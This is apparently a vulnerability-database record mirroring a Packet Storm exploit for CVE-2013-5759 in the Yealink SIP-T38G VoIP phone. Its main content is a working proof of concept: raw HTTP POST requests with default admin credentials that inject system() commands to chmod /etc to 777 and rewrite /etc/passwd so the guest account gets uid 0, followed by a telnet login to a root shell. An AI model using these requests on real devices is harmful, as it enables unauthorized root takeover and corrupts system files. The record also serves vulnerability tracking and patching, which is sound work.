ID

VAR-E-201406-0036


TITLE

Yealink VoIP Phone SIP-T38G Privilege Escalation

Trust: 0.5

sources: PACKETSTORM: 127093

DESCRIPTION

Yealink VoIP phone version SIP-T38G suffers from a remote privilege escalation vulnerability that gains a root shell.

Trust: 0.5

sources: PACKETSTORM: 127093

AFFECTED PRODUCTS

vendor:yealinkmodel:voip phone sip-t38gscope: - version: -

Trust: 0.5

sources: PACKETSTORM: 127093

EXPLOIT

Title: Yealink VoIP Phone SIP-T38G Privileges Escalation
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5759

Description:

Using the fact that cgiServer.exx run under the root privileges we use the
command execution (CVE-2013-5758) to modify the system file restriction.
Then we add extra privileges to the guest account.

POC:

Step 1 - Changing /etc folder right to 777:

POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

system("/bin/busybox%20chmod%20-R%20777%20/etc")

Step 2 - Change guest user uid:

POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

system("echo "root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:0:0:Guest,,,:/:/bin/sh\" > /etc/passwd
")

Step 3 - Connect back using telnet and guest account (password is guest):

# id
uid=0(root) gid=0(root)

Enjoy your root shell :)

--
*Mr.Un1k0d3r** or 1 #*

Trust: 0.5

sources: PACKETSTORM: 127093

EXPLOIT HASH

LOCAL

SOURCE

md5: f91eecd157fd3116c845bb4e76a76929
sha-1: d7be5a04dfd8ee551536aa9ff9df341bb1a61743
sha-256: 7c44a1a9f61f69ae042bf1629987bc2859ef4cae78be693127d1d81214dfd2ce
sha-256: 7c44a1a9f61f69ae042bf1629987bc2859ef4cae78be693127d1d81214dfd2ce

Trust: 0.5

sources: PACKETSTORM: 127093

EXPLOIT LANGUAGE

shell

Trust: 0.5

sources: PACKETSTORM: 127093

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 127093

TYPE

root

Trust: 0.5

sources: PACKETSTORM: 127093

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:shell

Trust: 0.5

tag:root

Trust: 0.5

sources: PACKETSTORM: 127093

CREDITS

Mr.Un1k0d3r, Doreth.Z10

Trust: 0.5

sources: PACKETSTORM: 127093

EXTERNAL IDS

db:PACKETSTORMid:127093

Trust: 0.5

sources: PACKETSTORM: 127093

SOURCES

db:PACKETSTORMid:127093

LAST UPDATE DATE

2022-11-21T17:43:35.201000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:127093date:2014-06-13T13:46:54